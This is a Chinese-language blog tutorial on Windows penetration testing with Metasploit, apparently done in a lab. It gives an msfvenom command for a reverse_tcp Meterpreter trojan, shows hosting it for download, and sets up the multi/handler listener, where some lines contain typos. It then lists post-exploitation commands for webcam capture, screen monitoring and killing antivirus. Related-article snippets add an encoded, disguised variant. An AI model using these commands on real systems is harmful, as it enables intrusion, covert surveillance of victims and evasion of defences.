msfvenom生成后台木马监听目标(windows渗透测试)

最新推荐文章于 2024-07-03 18:59:45 发布
最新推荐文章于 2024-07-03 18:59:45 发布
阅读量8.1k 收藏 38
点赞数 8
文章标签: 网络安全 渗透测试 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forget_mt/article/details/121739503
版权

针对windows操作系统的渗透测试

操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。

实战:

一:后台木马生成

注意在代码中LHOST:172.16.5.2与LPORT:4444  要根据实际情况来更改

LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.5.2 LPORT=4444 -f exe -o /root/shell.exe   //生成一个名为shell的木马

二:将木马移动到目标桌面

在root目录下找到我们生成的木马shell.exe然后将木马传到目标桌面

两种方法:

1.开启apache将木马上传到网页上,然后windows以访问网页的形式下载木马

service apache2 restart   //重启apache服务

访问渗透机出现以下后面就成功了,如果没有就说明没有安装apache服务

将木马文件移动到/var/www/html/目录下

重启apapche服务再次访问网页就出来了,然后下载木马文件到桌面就可以了

2.在虚拟机里安装VMware tools直接就可以把木马从kail桌面拖到windows桌面

三:运行exploit/multi/handler模块

启动msf

use exploit/multi/handler   //使用模块
set payloads windows/meterpreter/reverset_tcp    //设置payload
set LHOST 172.16.5.2    //设置172.16.5.2进行监听 
set LPORT 4444    //监听端口为4444

双击打开windows桌面上的木马就可以进入后渗透

 最后输入screenshare可以对目标进行实时监控

分享几个后渗透命令:

webcam_list        查看摄像头

webcam_snap        通过摄像头拍照

webcam_stream        通过摄像头开启视频

screenshot        获取屏幕截图

screenshare        实时监控桌面

shutdown        关闭目标机器

run getgui-e        启动目标远程桌面

sysinfo        查看目标系统信息

run killav        关闭目标杀毒软件

getuid        查看当前用户权限

getwd        查看目录

陳小陌
关注
  • 8
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3290
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
虚拟机检测技术攻防
热门推荐
whatday的专栏
08-27 5万+
前言 在当今信息安全领域,特别是恶意软件分析中,经常需要利用到虚拟机技术,以提高病毒分析过程的安全性以及硬件资源的节约性,因此它在恶意软件领域中是应用越来越来广泛。这里我们所谓的虚拟机(Virtual Machine)是指通过软件模拟的具有完整硬件系统功能的、运行在一个完全隔离环境中的完整计算机系统。通过虚拟机软件(比如VMware,Virtual PC ,VirtualBox),你可以在一台物
利用msfvenom制作windows木马及免杀马
最新发布
aheyor的博客
07-03 751
注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。原文链接:https://blog.csdn.net/qq_43332640/article/details/124072802。第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块。第二步:打开kali启动msfvenom,制作木马。第三步:木马捆绑,(主程序启动之后子程序随之启动)
msf017-010复现及木马利用
qq_56895581的博客
01-17 1262
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。被袭击的设备被锁定,并索要300比特币赎金。
msf_木马
jinhezhai的博客
05-13 2293
使用kali虚拟机生成木马使win7虚拟机中毒,并控制kali虚拟机 1.制作木马 打开kali虚拟机 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b " x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/ 西瓜影音 .exe 使用msfvenom生成木马, 在渗透过程中,MSF漏洞利用
MSF里侦听模块的使用教程 exploit/multi/handler
qq_45249394的博客
11-25 1万+
标题关于MSF侦听模块的第一次使用 侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7的查不到,可能不更新的原因吧。如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版和专业版,本人亲测免费版过不了wind...
68-68.渗透测试-生成木马获取shell(Windows).mp4
05-10
68-68.渗透测试-生成木马获取shell(Windows).mp4
渗透测试常用工具应用(PDF课件)
05-30
使用msfvenom生成木马进行渗透测试.pdf 使用Netcat进行反弹链接实验.pdf 使用meterpreter模块进行后渗透测试.pdf 使用Hydra进行密码破解.pdf 使用Saminside+Ophcrack破解本地用户密码.pdf 使用metasploit进行Hash...
十三、kali windows DVWA搭建及测试
01-15
网络安全领域,模拟真实环境进行渗透测试是提升技能的重要途径。 Damn Vulnerable Web Application (DVWA) 是一个由OWASP(Open Web Application Security Project)官方编写的PHP网站,专门设计用于教育目的,它...
渗透测试行业 网络安全 黑客术语
03-02
### 渗透测试行业核心知识点详解 #### 一、基础概念 **1. 渗透测试**:一种模拟真实攻击的测试方法,旨在评估系统的安全性。通过模拟黑客的行为和技术,发现并报告潜在的安全漏洞。 **2. 网络安全**:指确保网络...
Msfvenom建立后门程序指令及开启监听
Dreamsi_zhang的博客
08-13 7692
一、场景介绍
windows VMWare 安装虚拟机-保姆级图文教程(涵盖网络配置)
增强分享精神,维护良好的编程环境,传递你我他
12-19 2万+
windows 安装虚拟机-保姆级教程-涵盖网络配置
[内网基础]msf使用&内网实战演示
_DESpiSED的博客
11-14 1170
本文结合msfconsole和相关工具进行内网渗透实战演示,希望给大家一些思路。
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
flynnsin
01-28 3257
本文章仅用来学习交流,违法乱纪后果自负
Metasploit——客户端渗透
m0_62063669的博客
08-10 1197
2.社会工程学:骗取敏感信息,诱使目标执行含有漏洞利用代码的DOC、PDF等Payload。生成这个payload,就要生成一个安卓系统上可用的安装包文件,比如说一个.apk的安装包。目标访问恶意网站,漏洞利用代码会执行,进一步执行payload,然后反弹shell。在创建的宏里粘入Payload第一部分的VBA代码。1.含有漏洞利用代码的WEB站点:利用客户端漏洞。只要目标客户端执行制作的exe文件,就可获得目标shell。由Jjiktezjhl到最后。4. 利用Flash漏洞执行payload。....
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 2841
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
Kali-利用metasploit中的exploit/multi/handler进行攻击
齐泽文的Blog
04-22 1万+
在攻击服务器生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handl...
android 后台木马清除
08-04
在Android系统中,如果手机受到了后台木马的感染,我们可以采取一些措施来清除它。 首先,我们可以尝试使用安全软件进行扫描和清除后台木马。安全软件会检测系统中的恶意程序,并提供相应的清除操作。使用知名和可信的安全软件可以提高清除木马的效果。 其次,我们可以手动检查应用程序的权限和活动,找出异常和可疑的应用程序。在设置中的应用程序管理下,我们可以查看正在运行的应用程序和最近使用过的应用程序,并清除其中的后台运行程序。特别注意那些没有正当理由和明显作用的应用程序。 另外,我们可以检查系统中的网络连接,排除后台木马的影响。在设置中的网络和连接设置下,我们可以查看正在连接的网络并清除其中的异常连接。如果发现应用程序在后台频繁使用网络或连接到可疑的服务器,应立即进行关闭和断开操作。 最后,如果尝试以上方法仍然无法清除后台木马,建议进行恢复出厂设置。恢复出厂设置将会清除手机中所有的数据和应用程序,包括后台木马。但在进行恢复出厂设置之前,务必备份重要的数据和文件,以免丢失。 总之,清除Android后台木马需要多种方法的组合使用,可以借助安全软件、手动检查应用程序、排除异常网络连接,并在必要时进行恢复出厂设置。同时,平时要增强安全意识,避免点击可疑链接和下载不明来源的应用,以保护手机免受后台木马的侵害。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值